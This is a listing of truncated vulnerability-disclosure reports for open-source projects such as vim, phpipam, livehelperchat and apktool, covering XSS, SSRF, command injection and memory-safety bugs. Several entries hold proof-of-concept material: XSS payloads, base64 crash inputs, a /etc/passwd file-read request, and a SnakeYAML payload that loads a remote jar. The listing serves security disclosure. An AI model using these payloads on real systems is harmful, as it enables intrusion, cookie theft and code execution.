Cross-site Scripting (XSS) - Stored in pimcore/pimcore
Description Cross site scripting vulnerability in pimcore, pimcore field; it is fixed in this commit 832c34, but it is still executing XSS in the Icon field in events and news. Proof of Concept 1. Login to the demo account https://10.x-dev.pimcore.fun/admin/ 2. Go to settings -- data objects -- classes ...
Exposure of Sensitive Information to an Unauthorized Actor in eventsource/eventsource
Exposure of Sensitive Information to an Unauthorized Actor in EventSource/eventsource Reported on Feb 6th 2022 | Timothee Desurmont Vulnerability type: CWE-200 Bug Cookies & Authorisation headers are leaked to external sites. Description When fetching a URL with a link to an external site...
in clasp-developers/clasp
Description Clasp uses printf to log errors and useful information, in one instance of this logging - the printf call specifies format operators but lacks the appropriate arguments - leading to unrelated bytes being included in the output. Impact This vulnerability is capable of allowing an...
Server-Side Request Forgery (SSRF) in chocobozzz/peertube
Description First of all, thanks to my friend Haxatron for his excellent report. I read the fix commit, and I found out that the code only checked the IP addresses and didn't check the domain names that refer to a private IP address. Steps to reproduce first, set up a local server at 127.0.0.2:8000...
OS Command Injection in microweber/microweber
Description OS command injection, also known as shell injection, is a web security vulnerability that allows an attacker to execute arbitrary operating system (OS) commands on the server that is running an application, and typically fully compromise the application and all its data. Very often, an...
Cross-site Scripting (XSS) - Stored in livehelperchat/livehelperchat
Description LiveHelperChat is vulnerable to Stored XSS at the Message field in the Personal canned message tab of the User account page. Payload constructor.constructor'alert1' Steps to reproduce 1. Login then go to User account page https://demo.livehelperchat.com/siteadmin/user/account 2. Switch ...
Cross-site Scripting (XSS) - DOM in hakimel/reveal.js
Description The onmessage event listener in /plugin/notes/speaker-view.html does not check the origin of postMessage before adding the content to the webpage. The vulnerable code allows any origin to postMessage on the browser window and feeds the attacker's input to parts using which the attacker can...
Exposure of Sensitive Information to an Unauthorized Actor in cjferna/photo-services-mashup
Description Please enter a description of the vulnerability. Vulnerable URL: https://github.com/cjferna/Photo-Services-Mashup/blob/fdc12e0671e035bac00cc46ee67d456540444460/src/es/um/taw/rest/imagga/Imagga.java It contains sensitive API Keys and secret keys. Proof of Concept private final String U...
Cross-site Scripting (XSS) - Reflected in phpipam/phpipam
Description A Cross-Site Scripting vulnerability which allows attackers to execute arbitrary JavaScript code in the browser of a victim, affecting the import data set feature via a spreadsheet file upload. Proof of Concept Endpoint 1 POST http://HOST/app/admin/import-export/import-vlan-preview.php ...
in phpipam/phpipam
Description phpIPAM 1.4.5 incorrectly assigns a privilege to a particular actor, creating an unintended sphere of control for that actor in the Import/Export feature. A normal user with the role of User could download an XLS file of IP addresses, a hostfile dump and export the system database that...
in vim/vim
Description Floating point error in tabstopfromto. commit : 7676c158798a7c90f500cab2c12af0d47bad6026 Proof of Concept $ echo -ne "bm9ybTBvMDD/MDAwMDAwMDAwMDAwMDAwMDAwMApzaWwhbm9ybRZjMDAwCQpmdSBSZXRhYihnLG4p Cm8KZXhlInJldCJhOm4KZW5kZgpjYWwgbCgiIixSZXRhYigwLDQpCnNlIHRhYnN0b3A9NTAwMDAw...
Cross-site Scripting (XSS) - Stored in bytebase/bytebase
Description Hello there, there is a stored XSS in bytebase SQL editor. Proof of Concept 1. Install bytebase on your system. 2. Go to /sql-editor and create a new query with name 3. Go back to the /sql-editor and go to Queries tab and see that a pop up appears, indicating the XSS payload is...
Exposure of Sensitive Information to an Unauthorized Actor in transloadit/uppy
Description First, thanks to my friend Haxatron for this awesome report. I reviewed the @uppy/companion code from the source to the sink, and I figured out a significant issue that makes any SSRF protection ineffective. I put myself as a Developer and started to read the companion document, and then I s...
in luigirizzo/netmap
Description In the Netmap source code, calls to DbgPrint can be found to contain a formatting argument (%p, to be specific) yet no argument; this would in most cases lead to nearby data being printed to the debug stream. Impact This vulnerability is capable of allowing an attacker to read data from...
Cross-site Scripting (XSS) - Stored in alanaktion/phproject
Description Stored Cross-Site Scripting (XSS) vulnerability due to the lack of content validation and output encoding. The vulnerability can then be triggered when the user previews the document's content. Proof of Concept login and navigate task Dependencies This task depends on: This task is a...
Improper Authorization in phpipam/phpipam
Description In phpIPAM 1.4.5, a normal user with the role of User could view/read the log files via the show-logs.php, errorlogs.php and accesslogs.php endpoints. It is supposedly accessible by the Administrator only. Proof of Concept Tested version: phpIPAM 1.4.5 Affected endpoints: 1 GET/POST...
in mruby/mruby
Description OOB read and OOB write in mrb_ary_push. commit: 903c5f978a2966465d8d5c6dfac55a977d134287 Proof of Concept $ echo -ne "bAticjWSUkRPTkxZC2I9e30MWyohMCxtOjAwLG06MF09MXxbKiEwLG0wXQo=" |base64 -d poc ASAN $ ./bin/mruby ./poc AddressSanitizer:DEADLYSIGNAL...
Improper Access Control in mautic/mautic
Description I couldn't find a suitable vulnerability type for this kind of issue, so this may be incorrect the default .htaccess file has some restrictions in the access to PHP files. Deny access via HTTP requests to all PHP files. Order deny,allow Deny from all ... Except those whitelisted bello...
Business Logic Errors in publify/publify
Description It was found that if a user tries to create an article and wants to make that article private, the functionality is not working. Proof of Concept 1. Create an article 2. Click on publish and you will see the visibility option to make it private, but the functionality is not designed...
Improper Access Control in phpipam/phpipam
Description In phpIPAM 1.4.5, a normal user with the role of User could download or export IP subnets that may contain sensitive information related data such as IP address, IP state, MAC, owner, hostname and device via export-subnet.php endpoint. The bug is the export-subnet.php should verify th...
in cortezaproject/corteza-server
Description During testing it was found that if a user revokes all his active sessions, the user is still able to make changes to his account. Proof of Concept 1. Log in to the application 2. Go to profile login sessions and revoke all sessions. 3. You will see that all other sessions are still vali...
Cross-site Scripting (XSS) - Stored in s-cart/s-cart
Description Stored XSS in S-Cart Version 6.8.3 affecting Product and Category module. Proof of Concept Product version: S-Cart Version 6.8.3 core 6.8.10 , https://github.com/s-cart/s-cart/releases/tag/v6.8.3 Vulnerability 1: Stored XSS In Product module 1 Endpoint: POST...
the function deepFromFlat of underscore.deep is vulnerable to prototype pollution
Prototype Pollution in Clever/underscore.deep Reported on Feb 2nd 2022 | Timothee Desurmont Description Vulnerability type: CWE-1321 Version 0.5.1 of underscore.deep is vulnerable to prototype pollution; the function deepFromFlat in underscore.deep.js does not check if the attribute resolves to the...
Improper Authorization in bytebase/bytebase
Description Hello bytebase team, there is an improper privilege management in the bytebase source code. This allows a user to view another user's inbox. Proof of Concept 1. Install bytebase, create new users user1 and user2 2. Login as user1, go to this link /api/inbox?user=user-id and change user-id to ...
in gpac/gpac
Description Null Pointer Dereference in afrt_box_read Proof of Concept echo AAAAEW1ldGFzXSAAAABkaXIAAAAAYWZydHRzdnB5dG/oAwBtAGwAAm0= | base64 -d poc gdb output pwndbg r -bt poc Starting program: /run/shm/gpac/bin/gcc/MP4Box -bt poc ERROR: Could not find ELF base! Thread debugging using...
in mruby/mruby
Description There is a NULL Pointer Dereference in iv_free src/variable.c:232:20. This bug has been found on the mruby latest commit hash 00f2b74ab2c1f03084908c815dcd0934f9fc702a on Ubuntu 20.04 for x86_64/amd64. Proof of Concept 3.timese=0," =c= y:0,0 0" Steps to reproduce 1- Clone repo and build wit...
Command Injection in ibotpeaches/apktool
Description Arbitrary code execution when an APK is built with a malicious apktool.yml due to SnakeYAML's load function Proof of Concept 1: Modify apktool.yml somevar: !!javax.script.ScriptEngineManager !!java.net.URLClassLoader !!java.net.URL "http://127.0.0.1:8000/yaml-payload.jar" 2: Download...
in gpac/gpac
Description Null Pointer Dereference in gitnboxdel Proof of Concept bash echo -n AAAAEW1ldGEwMDAwMDAwMDAAAABjMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAAAAARZ2l0bjAwMDAwMDAwMA== | base64 -d poc ./MP4Box -bt ./poc...
None in vim/vim
Description Use After Free in enter_buffer function. commit: 5703310e640c4b142a16a3ea4f45317565ae8c32 Proof of Concept $ echo -ne "ZnUgUigpCiAgdGFiIGxvcAogIGxldCBsOj1nCiAgZQEKbGYKZW5kZgoKY2FsIGFzYWwoIiIsUigp KQpjYWwgYXNhbCgiIixSKCkpCmNhbCBhc2FsKCIiLFIoKSkKYnchCg==" | base64 -d poc ASAN $...
Cross-site Scripting (XSS) - Reflected in ptrofimov/beanstalk_console
Description Beanstalk Console is vulnerable to reflected Cross-Site Scripting via the server parameter. Steps to reproduce 1. Set up the Beanstalk console locally. 2. Go to https://localhost/public/? and add a random server. 3. Visit...
in alextselegidis/easyappointments
Description The software is a booking management system that has a public form to place bookings, and a private area for the calendar and management of services, users, settings, etc... There is a backend API that allows data manipulation, including listing the appointments for a specific time...
Cross-site Scripting (XSS) - Reflected in navigatecms/navigate-cms
Description Cross-Site Scripting is a vulnerability which allows attackers to execute arbitrary JavaScript code in the browser of a victim. Proof of Concept Parameter: id Payload: alertdocument.cookie Affected endpoints: On Firefox browser, visit: 1...
Cross-site Scripting (XSS) - Stored in s-cart/core
Description Multiple Stored XSS exists in S-Cart Version 6.8.4 and below leads to cookie stealing of any victim that visits the affected URL. This vulnerability has the potential to steal a user's cookie and gain unauthorized access to that user's account through the stolen cookie. Proof of Conce...
Improper Privilege Management in liangliangyy/djangoblog
Description Hi there, I would like to report an improper privilege management vulnerability in the djangoblog source code. This would allow an attacker to create a comment on behalf of anyone. Proof of Concept 1. Install a local instance of djangoblog, login as admin and create an article 2. Create a n...
Cross-site Scripting (XSS) - Stored in liangliangyy/djangoblog
Description Hi there, I would like to report a stored Cross Site Scripting vulnerability in djangoblog source code. Cross-site scripting also known as XSS is a web security vulnerability that allows an attacker to compromise the interactions that users have with a vulnerable application. It allow...
in microweber/microweber
Description In the Microweber CMS, there are two endpoints that can be used together to get local file inclusion vulnerability. 1. /api/BackupV2/upload?src=/etc/passwd 2. /api/BackupV2/download?file=passwd When logged in as administrator, we can upload any readable file from the operating system...
Heap-based Buffer Overflow in vim/vim
Description Heap Overflow in exretab. This issue was created to separate the previous issue. This bug has already been fixed with patch 8.2.4245. Proof of Concept $ echo -ne "bm9ybTBvMDAwMDAwMDAwMDAwMDAwMDAwMDD/MJMwMDAKc2lsIW5vcm0WYxwwMAkwCmZ1IFJldGFi...
in radareorg/radare2
NULL pointer dereference in load_buffer radare2 suffers from a NULL pointer dereference error in load_buffer of bin_xnu_kernelcache.c Environment date Fri Jan 28 11:03:53 PST 2022 uname -ms Linux x86_64 ./radare2 -v radare2 5.5.5 27531 @ linux-x86-64 git.5.5.4 commit:...
Cross-site Scripting (XSS) - Reflected in phpipam/phpipam
Description Reflected XSS attacks, AKA non-persistent attacks, occur when a malicious script is reflected off of a web application to the victim's browser. The script is activated through a link, which sends a request to a website with a vulnerability that enables execution of malicious scripts. The...
Business Logic Errors in dolibarr/dolibarr
Description Dolibarr is vulnerable to Business Logic Errors in the Weight, Length x Width x Height, Area, Volume fields of a Product since these values can be negative numbers. Proof of Concept 1. After login, in the top menu bar, click Products 2. In the left menu bar, click List to view the list ...
Open Redirect in alanaktion/phproject
Description Open Redirect in Login page due to unchecked to parameter. Proof of Concept Send users the following link https://demo.phproject.org/login?to=//example.com After users use their registered account to login, they will be redirected to example.com Impact By modifying the URL value to a...
Open Redirect in alanaktion/phproject
Description Bypass open redirect protection Proof of Concept patch for this report https://huntr.dev/bounties/1183df1a-5243-42f9-a263-267b92444b03/ easily can be bypassed Bypass url https://demo.phproject.org/login?to=//example.com...
None in vim/vim
Description Use after free occurs in skipwhite function charset.c:1474. commit : 166788c657f4b1090a31ea37a023b1f2c78790c8 Proof of Concept $ echo -ne "ZnUgUmUwYTAoZyxuKQp+CnMvCnIwIzAKZW5kZgpzL1wlJykvXD1hMDAwKDAwMDAwMDAwMDAwMDAw MDAwMDAwMDAwMDAwMDAwMDAwLCBSZTBhMCgnJywwMDApMDA=" | base64 -d...
Heap-based Buffer Overflow in vim/vim
Description Heap-buffer-overflow on read in yank_copy_line This issue was created to separate this one and was fixed with Patch 8.2.4219. Proof of Concept Steps to reproduce: echo -n c2lsIW5vcm0wbxSA/zAWenk= | base64 -d heapowpoc3 vim -u NONE -i NONE -n -X -Z -e -m -s -S heapowpoc3 -c :qa! Sanitize...
Cross-site Scripting (XSS) - Stored in livehelperchat/livehelperchat
Description Livehelperchat is vulnerable to stored cross site scripting. Proof of Concept 1. Login to the demo account 2. Go to settings -- Live help configuration -- Visual settings for the visitor -- widget theme -- new -- name field 3. Add payload in name field and click save 4. Go to settin...
Cross-site Scripting (XSS) - Stored in livehelperchat/livehelperchat
Description LiveHelperChat is vulnerable to Stored XSS at the Name and Surname fields in the User account page. Payload constructor.constructor'alert1' Steps to reproduce 1. Login then go to User account page https://demo.livehelperchat.com/siteadmin/user/account 2. In the Name and Surname fields,...
Business Logic Errors in crater-invoice/crater
Description It is found that the company currency can not be changed since the field is disabled, as shown in the screenshot, but it can be changed by tampering with the parameter. Proof of Concept Actual Request POST /api/v1/company/settings HTTP/1.1 Host: demo.craterapp.com User-Agent: Mozilla/5.0 Windows...
Cross-site Scripting (XSS) - Stored in microweber/microweber
Description Stored XSS occurs when changing a user's profile Proof of Concept XSS POC : "alertdocument.domain 1. Open the https://demo.microweber.org/demo/admin 2. Go to "Users" "Edit profile" 3. Change the value of "First Name" to XSS PoC 4. Refresh Impact Through this vulnerability, an...
in delgan/loguru
Description Loguru is vulnerable to log injection on all logging methods as it is possible to inject newlines "\n" which will create a new log entry in the logfile. This can lead to attackers tampering with logs and a loss of integrity of the log files as a result Proof of Concept from loguru...
Cross-Site Request Forgery (CSRF) in crater-invoice/crater
Description An attacker is able to log out a user if a logged-in user visits the attacker's website. Proof of Concept history.pushState'', '', '/' document.forms0.submit; Impact This vulnerability is capable of forging users to unintentional logout. More details One way GET could be abused here i...